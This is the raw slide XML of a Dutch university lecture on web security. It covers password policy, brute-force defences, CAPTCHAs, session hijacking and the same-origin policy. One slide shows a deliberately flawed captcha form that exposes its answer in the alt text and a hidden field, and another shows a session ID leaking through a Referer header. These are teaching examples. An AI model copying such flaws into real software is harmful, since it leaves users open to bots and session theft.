            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35846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5946779"/>
            <a:ext cx="2881312" cy="11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1567036" y="1226235"/>
            <a:ext cx="6912768" cy="5635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Mensen zijn lui en maken fouten...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56" y="1916832"/>
            <a:ext cx="7545185" cy="36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83" y="2492896"/>
            <a:ext cx="5911449" cy="4104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580" y="2420887"/>
            <a:ext cx="2952328" cy="3996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63" y="4365104"/>
            <a:ext cx="5391737" cy="2232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500" y="1340768"/>
            <a:ext cx="3960440" cy="53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5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280642" cy="5257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/>
              <a:t>Dus: vaak wijzigen, format afdwingen!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Systemen met elke week een nieuw password... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>...hebben gebruikers met eenvoudige passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Systemen die een bepaald format afdwingen...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>...hebben gefrustreerde gebruikers...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>...en overwerkte systeembeheerders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Passwords alleen zijn niet het antwoord</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Het systeem is zo kwetsbaar als z'n gebruikers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84" y="2694260"/>
            <a:ext cx="4114800" cy="39751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356" y="2708920"/>
            <a:ext cx="5280586" cy="396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00" y="0"/>
            <a:ext cx="79321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71" y="1628800"/>
            <a:ext cx="8794529" cy="4610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0"/>
            <a:ext cx="8739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3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280642" cy="5257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Passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>altijd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>verzenden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En passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>altijd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hashed (en salted) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>opslaan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Een</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hash is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altijd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dictionary attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replay attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>En </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>soms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is het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simpeler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Shared hosts in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bibliotheken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, internet cafés, met...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...key-loggers, packet-sniffers, spyware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, browsers die passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onthouden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839" y="1412776"/>
            <a:ext cx="7510989" cy="5184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Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41602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208634" cy="5257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/>
              <a:t>Brute force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Automatische tools om passwords te proberen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Of juist om usernames te proberen...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lockout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Response time doubling met reset na zekere tijd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lockout kan het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1"/>
              <a:t>doel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> zijn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gebruik een multi-layer access methode (OTP) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Geef feedback over de login geschiedenis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Controleer de "menselijkheid" van de gebruiker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856" y="1616100"/>
            <a:ext cx="3343920" cy="5015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64" y="1412776"/>
            <a:ext cx="3964938" cy="2167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65" y="3356992"/>
            <a:ext cx="5328592" cy="91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0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Captcha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5" y="1295400"/>
            <a:ext cx="9678412" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely Automated Public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Turingtest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to tell Computers and Humans Apart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Voorkomen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> door bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bijvoorbeeld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forumposts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, gratis e-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mailaccounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Serieus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>probleem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toegankelijkheid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>False positives en false negatives; unhappy users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W3C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adviseert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alternatieven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in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zetten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eenvoudige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> captchas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gekraakt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>worden</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steeds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>moeilijkere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> captchas; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>andere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> taken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tegenmaatregel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>huur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"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paar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ogen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, bugs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inzet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04" y="1340768"/>
            <a:ext cx="7525814" cy="5328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0768"/>
            <a:ext cx="9902825" cy="5229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636" y="1556792"/>
            <a:ext cx="2681767" cy="3759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92" y="1556792"/>
            <a:ext cx="4648200" cy="386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7316" y="3501008"/>
            <a:ext cx="3384376" cy="16611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5308" y="1899559"/>
            <a:ext cx="3456384" cy="1614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9004" y="1196752"/>
            <a:ext cx="7416824" cy="4924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3100" y="3106847"/>
            <a:ext cx="5688013" cy="1186249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/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="35992" rIns="91420" bIns="71985"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</a:rPr>
              <a:t>"Spammers pay about $0.80 to $1.20 for each 1,000 solved CAPTCHAs to companies employing human solvers in Bangladesh, China, India, and many other developing nations. Other sources cite a price tag of as low as $0.50 for each 1,000 solved." – Wikipedia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9004" y="4005064"/>
            <a:ext cx="73660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9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Captcha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88" y="1340767"/>
            <a:ext cx="7704856" cy="5516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028" y="1412776"/>
            <a:ext cx="7023485" cy="5168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84" y="1328068"/>
            <a:ext cx="5715000" cy="328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648" y="3429000"/>
            <a:ext cx="5575300" cy="323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420" y="1268760"/>
            <a:ext cx="4711700" cy="226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84" y="3138760"/>
            <a:ext cx="5715000" cy="353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1132" y="2071464"/>
            <a:ext cx="5194300" cy="373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326" y="1413644"/>
            <a:ext cx="8982590" cy="23753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924" y="4437112"/>
            <a:ext cx="8856984" cy="17673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0940" y="1220894"/>
            <a:ext cx="7412880" cy="54484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7156" y="1221552"/>
            <a:ext cx="4824536" cy="558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00" y="3369841"/>
            <a:ext cx="4908600" cy="130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Bad Captcha!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/>
              <a:t>Captchas horen thuis in session data!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0932" y="3717032"/>
            <a:ext cx="8784976" cy="400110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 New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;img src="captcha.php?captcha=pexpopti" alt="pexpopti"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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56" y="2260600"/>
            <a:ext cx="2514600" cy="1168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0932" y="4606096"/>
            <a:ext cx="8784976" cy="1631216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 New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form action="captcha.php" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="userinput"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="hidden" name="captcha"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>         value="c9680657e092444fcb08f0d5f903f15a"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2397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055"/>
            <a:ext cx="9919964" cy="7424473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7"/>
            <a:ext cx="9902825" cy="765175"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Security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296400" y="6343654"/>
            <a:ext cx="606425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90" indent="-28568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53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54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956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058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157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262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362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fld id="{756AECCE-3931-9A49-BFF7-85E53012F1F2}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="5E574E"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="5E574E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6119822"/>
            <a:ext cx="9902825" cy="765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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Webtechnologie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="55566" y="6192839"/>
            <a:ext cx="2287587" cy="69215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l-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Lennart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l-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Herlaar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35846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5946779"/>
            <a:ext cx="2881312" cy="11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7140" y="2996952"/>
            <a:ext cx="9902825" cy="765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5pPr>
            <a:lvl6pPr marL="457101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6pPr>
            <a:lvl7pPr marL="914204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7pPr>
            <a:lvl8pPr marL="1371303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8pPr>
            <a:lvl9pPr marL="182840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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="482600">
                    <a:srgbClr val="CC0000">
                      <a:alpha val="75000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Session security, XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289058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21" y="1124744"/>
            <a:ext cx="9907846" cy="6882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407519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Username en password ping-pongen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$_COOKIE['authenticated'] = 1 ping-pongen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aannames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Session identifier in GET en POST data of een cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overige session data op de server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Als ik jouw session identifier heb, dan ben ik jou!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Een session identifier (SID) werkt als een voucher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Je password ruil je bij inloggen om voor deze voucher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"Put your eggs in one basket"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"and watch that basket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> well"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244493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flipH="1">
            <a:off x="3494113" y="1158652"/>
            <a:ext cx="6408712" cy="5661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hijacking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280642" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fysieke toegang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Shoulder surfing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Toegang tot files, cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Session sidejacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Packet-sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Plain stupidity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Onbeveiligde WiFi netwerken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GET query string: bookmarks, referer, "leuke links" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Deels eenvoudig te voorkomen: cookies, HTTPS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8964" y="5157192"/>
            <a:ext cx="8784976" cy="400110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 New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Referer: http://www.cs.uu.nl/index.html?SID=1A8E5BA3890D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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0238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 Black" charset="0"/>
              </a:rPr>
              <a:t>Inhoud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial Black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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Security, passwords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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Session security, XSS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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>SQL injection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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Input validation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>RegExp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38915" name="Picture 5" descr="show_tel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57" y="1811685"/>
            <a:ext cx="4067175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33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17140" y="1124744"/>
            <a:ext cx="8712968" cy="5868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guessing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136626" cy="52578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/>
              <a:t>Bij een voldoende grote site wordt het raden van een SID plausibel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Er zijn altijd veel actieve, geldige SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Niet gericht tegen een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1"/>
              <a:t>specifieke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> gebruiker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Oplossingen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gebruik lange random SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Timeout op SID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1"/>
              <a:t>zonder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> van Expires uit te gaan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Regelmatig regenereren van SID (maar...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22153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4807396" y="1196751"/>
            <a:ext cx="5095429" cy="5664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Same Origin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5" y="1295400"/>
            <a:ext cx="9407520" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Browsers hanteren een Same Origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Logische scheiding tussen sites en hun gegevens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Alleen uitwisseling met site van herkomst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Maar fysiek komt het wel in de browser bijelkaar!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Veel aanvallen zijn gericht op doorbreken SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-site scripting (XSS), cross-site request forgery (CSRF of XSRF), cross-site cooking, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
